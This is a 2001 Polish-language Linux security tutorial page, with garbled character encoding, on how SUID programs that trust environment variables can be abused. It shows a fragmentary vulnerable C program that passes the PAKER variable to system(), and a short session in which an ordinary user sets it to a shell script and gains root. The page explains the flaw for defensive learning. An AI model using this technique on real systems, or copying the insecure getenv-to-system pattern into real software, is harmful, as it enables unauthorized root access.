Bezpiecze±stwo system≤w Linux'owych

Linux Security - Suidy
Strona g│≤wna

Zmienne systemowe
[1] [2] [3] [4] [5]
Niekt≤re programy korzystaj▒ ze zmiennych systemowych. Mechanizm ten odpowiednio wykorzystany przez w│amywacza mo┐e byµ du┐ym zagro┐eniem dla systemu.
Przyk│adem tego mo┐e byµ aplikacja typu SUID daj▒c▒ mo┐liwo╢µ wyboru programu archiwizuj▒cego dane. Postaµ tego programu mo┐e byµ mniej wiΩcej taka:
[root@localhost]# more pakowarka.c
void main()
..
..
char *pak;

if ((pak=getenv("PAKER"))!=NULL)
	strcat(pak,"dane");
	system(pak);
}
else
{
	system("/bin/gzip dane");
}
..
..
W czasie zwyk│ego u┐ytkowania program zachowuje siΩ normalnie lecz odpowiednia zmiana zmiennej systemowej mo┐e daµ zwyk│emu u┐ytkownikowi prawo root'a
[tronix@localhost]$ export PAKER="./shell"
[tronix@localhost]$ cat ./shell
/bin/bash
[tronix@localhost]$ pakowarka
[tronix@localhost]# whoami
root


ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - KsiΩga go╢ci - Statystka - Linki

Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved